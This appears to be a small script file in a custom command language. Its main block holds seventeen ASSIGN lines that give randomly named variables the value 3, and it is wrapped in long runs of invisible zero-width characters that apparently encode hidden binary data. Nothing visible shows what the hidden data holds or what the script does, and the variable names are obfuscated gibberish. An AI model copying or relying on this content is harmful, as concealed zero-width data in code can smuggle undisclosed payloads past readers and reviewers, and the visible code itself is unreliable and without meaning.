type command
args:
endargs
data:
enddata
⁣​​⁣​⁣​⁣​​⁣⁣​​​⁣​⁣​⁣⁣⁣​⁣​​​⁣​⁣⁣⁣⁣⁣​⁣⁣​⁣⁣​​​​⁣​​⁣​⁣⁣⁣⁣​⁣​⁣​⁣​​​⁣​​​⁣​⁣⁣⁣⁣⁣⁣​​​⁣​​​​​⁣⁣​⁣​⁣​​​​​⁣​⁣⁣⁣⁣​⁣​​⁣​​⁣⁣​​​⁣​⁣​​⁣​⁣​⁣​⁣​​​⁣⁣⁣​⁣​​⁣⁣⁣​​⁣​​⁣⁣​​⁣​⁣​​​​​​⁣​​​​⁣⁣⁣⁣​⁣​⁣⁣⁣⁣​​⁣⁣⁣⁣​⁣​⁣​⁣⁣⁣​⁣⁣​​⁣​​​⁣​⁣​⁣⁣​⁣​​⁣​​​⁣⁣​⁣⁣​⁣​​​⁣​​​​⁣​⁣​⁣⁣⁣⁣​​⁣⁣​​​​​​​⁣​​​⁣⁣​⁣​⁣​​​⁣​⁣​​⁣⁣⁣​⁣​​⁣​​⁣​⁣⁣⁣⁣⁣​​⁣​⁣⁣⁣⁣​⁣​​⁣⁣⁣⁣⁣⁣⁣⁣⁣​⁣​⁣⁣​​⁣​​​​​⁣⁣⁣​⁣⁣​​​⁣⁣​​⁣​​⁣⁣​⁣⁣⁣​⁣​​⁣​⁣​⁣⁣⁣⁣​⁣⁣​​​⁣⁣​​⁣​​⁣⁣​​​⁣​​⁣​​⁣​​​⁣⁣⁣⁣⁣⁣​​⁣⁣​⁣​⁣⁣⁣​⁣​⁣⁣⁣​⁣⁣⁣​⁣​⁣⁣⁣⁣​​​⁣⁣⁣​​⁣⁣⁣⁣⁣​⁣⁣​⁣⁣⁣⁣​⁣​​⁣⁣​​⁣⁣​​⁣⁣​⁣​​​​⁣​⁣⁣​⁣⁣​​​​⁣​⁣​​​​⁣​⁣​⁣⁣⁣⁣⁣​⁣⁣​​​​​⁣​⁣⁣⁣​⁣​​​​​​​​⁣​⁣​​​​​⁣⁣⁣​⁣​⁣main:
ASSIGN [>>>s.-YuWwUiO=:OGlJz?-YuWwU1fmIaqVnt!-YuWwUFW+*2pH@Lq-k7!~A] 3
ASSIGN [UcQB1-UfQ$%89+!5Jl4/p-UfQ$%gW+A<E?}es-UfQ$%GDFP%5ScsQ-CUqMW] 3
ASSIGN [IvQu8-d9.+0)n0zoSgAE}-d9.+0ZZmr8tdx?X-d9.+01=x{@.J!CI-yA7y1] 3
ASSIGN [zRWri-|Ar=jJ4!).OXk%m-|Ar=j/kG!@bj&=c-|Ar=jUuL4c/9^*K-(qkS?] 3
ASSIGN [yF}o8-)?N_+MwEOHhcw2<-)?N_+Cx91WjAaky-)?N_+4^@W6.*F|N-~S+x3] 3
ASSIGN [L3J4)-1E:AR:$:Dxt&sm2-1E:ARL(j}3=a=iF-1E:ARt2=<vsdj!b-N<*GZ] 3
ASSIGN [AN+i5-**NWJ*aALThP}vP-**NWJL%gN#<LJxM-**NWJLw@6WW=^|n-MR+xe] 3
ASSIGN [HJmh=-E4x&*kj<(q{QEgt-E4x&*+?xf?SPNIK-E4x&*J<Eatk5}A)-n)Xa=] 3
ASSIGN [/vKsU-E(@9*rG*>Z<.A_~-E(@9*j>T:SzJRRj-E(@9*7J%&xU18.q-%i.OF] 3
ASSIGN [mUA_x-!PF>%<=m|:?|yh9-!PF>%JA4ZH9r(>o-!PF>%Y@&I1:%GTC-p_RQR] 3
ASSIGN [HO468-bnN/$E0G3+CyIVb-bnN/$pAXpi|gJSv-bnN/$5kLI>U_D?T-4GV^(] 3
ASSIGN [bq{|$-/G0<$mR9xpKv^}|-/G0<$HCwo#Y($h<-/G0<$8eUfPoawi8-E%4I1] 3
ASSIGN [6/W4+-OL^5LV#S%XL_516-OL^5L8WFkSQ:K@=-OL^5LgaMc?a|&RS-N$uaC] 3
ASSIGN [wi6tZ-3atz~2M#&XyT3^8-3atz~^x_9ORN6VW-3atz~=<4GE2AJfr-)3~l<] 3
ASSIGN [ey5Tz-xO7si/.F/1(}H_Z-xO7siq(I_!~/On^-xO7si<i!R!S~#zh-8#RKY] 3
ASSIGN [)_=8K-Z6.FmI:F+!Lk}m#-Z6.FmnAnX~NG*N/-Z6.FmEx4Z}:6thm-kh^dO] 3
ASSIGN [Cbs@B-a7G!S/Wz$mDr|sU-a7G!SQIkb{vZ&>@-a7G!Swz6dm?XH5_-:H=D6] 3
⁣⁣⁣⁣⁣​​​⁣⁣⁣​⁣​​⁣⁣​​​​​⁣​​​⁣​​⁣⁣⁣⁣⁣​​​​​⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣​⁣⁣​⁣⁣​⁣​⁣​​⁣​⁣⁣⁣⁣⁣⁣​⁣​⁣⁣​​⁣​​​⁣​​​⁣⁣​⁣​​​​​⁣⁣​⁣​​​​⁣⁣​⁣​​​⁣⁣⁣​​​​​​⁣​⁣⁣⁣⁣​⁣​⁣⁣​​⁣⁣​⁣⁣​⁣⁣⁣​​​⁣⁣⁣​⁣​⁣​​⁣⁣​​⁣⁣⁣​⁣​​⁣​⁣⁣​​​​​⁣​​⁣⁣​​⁣​⁣⁣⁣⁣​​⁣⁣⁣⁣⁣​⁣⁣​​⁣⁣⁣⁣⁣​⁣​​⁣​​⁣⁣​⁣⁣​⁣​​⁣⁣​​⁣​​​​⁣​​​​⁣​⁣​⁣⁣​⁣​​⁣​​⁣​​​⁣​⁣⁣⁣​​⁣​​⁣​⁣​⁣​⁣​⁣⁣⁣​​​⁣​⁣​​​⁣​​​​​​⁣⁣⁣⁣⁣​⁣​​​⁣⁣​​⁣​⁣⁣⁣⁣​​⁣⁣​​⁣⁣⁣​⁣⁣⁣​​⁣⁣⁣⁣​⁣​⁣​​⁣⁣​​⁣⁣⁣​​⁣​​​⁣⁣​⁣⁣​⁣​​​⁣​​⁣​​⁣⁣⁣​​​⁣​​​⁣⁣​​​​​⁣​​⁣⁣⁣⁣⁣⁣⁣⁣⁣​​​⁣​​​​⁣​⁣⁣​⁣⁣⁣​⁣​⁣​​⁣​⁣⁣⁣⁣​​​​​​​​​⁣⁣⁣​​⁣⁣⁣​​​⁣⁣⁣⁣⁣⁣​⁣​⁣⁣⁣​​⁣⁣​⁣​​⁣​⁣⁣​​​​⁣⁣​​​⁣​⁣​⁣​​⁣⁣​⁣⁣​​⁣⁣​​​​​⁣​⁣​​⁣​​⁣​​​⁣​⁣⁣​⁣⁣⁣⁣⁣endmain
